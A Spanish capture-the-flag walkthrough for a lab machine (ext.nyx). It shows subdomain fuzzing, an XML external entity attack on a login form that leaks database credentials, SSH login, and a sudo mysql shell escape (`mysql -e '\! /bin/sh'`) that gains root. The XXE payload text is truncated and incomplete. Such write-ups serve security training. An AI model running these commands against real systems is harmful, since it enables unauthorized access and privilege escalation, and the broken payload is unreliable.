Hacemos el reconocimiento con nmap: {{pasted_image_20230926104210.png|}} Y en el puerto 80 vemos que no hay nada aparentemente: {{pasted_image_20230926104349.png|}} Pero si vemos el código fuente nos encontramos con esto: {{pasted_image_20230926104410.png|}} Añadimos el dominio en el /etc/host: {{pasted_image_20230926104535.png|}} Y hacemos búsqueda de subdominios: wfuzz -c -t 200 --hl 75 -w subdomains-top1million-110000.txt -H "Host: FUZZ.ext.nyx" http://ext.nyx O con gobuster: gobuster vhost -u http://ext.nyx -w subdomains-top1million-110000.txt | grep -v '400' Y tenemos el subdominio administrator: {{pasted_image_20230926105521.png|}} Lo añadimos al /etc/hosts y deberíamos poder acceder a él desde el navegador: {{pasted_image_20230926105704.png|}} {{pasted_image_20230926105714.png|}} Ponemos unas credenciales aleatorias e interceptamos con burp suite la petición, donde vemos que poder estar ante un XML External Entity: {{pasted_image_20230926105854.png|}} Le ponemos el siguiente payload basándonos en el que viene por defecto: ]>
&prueba; 1234
Vemos que hay un usuario llamado mysql: {{pasted_image_20230926124527.png|}} Por lo que podemos intentar apuntar contra el mysql.history: ]>
&prueba; 1234
{{pasted_image_20230926124604.png|}} Y tenemos las siguientes credenciales: root:r00tt00rDB Iniciamos sesión con estas credenciales y vemos que funciona bien: {{pasted_image_20230926125018.png|}} {{pasted_image_20230926125032.png|}} Y vemos la contraseña del usuario admin: {{pasted_image_20230926125108.png|}} admin:4dminDBS3cur3P4ssw0rd123 Y con esta contraseña entramos correctamente por ssh: {{pasted_image_20230926125555.png|}} Y si ejecutamos el comando sudo -l vemos cómo podemos ejecutar como sudo mysql: {{pasted_image_20230926125756.png|}} Buscamos en gtfobins como explotar esto y lo hacemos, pero nos pedirá que pongamos la contraseña de la base de datos nuevamente: sudo /usr/bin/mysql -e '\! /bin/sh' -p r00tt00rDB {{pasted_image_20230926125910.png|}}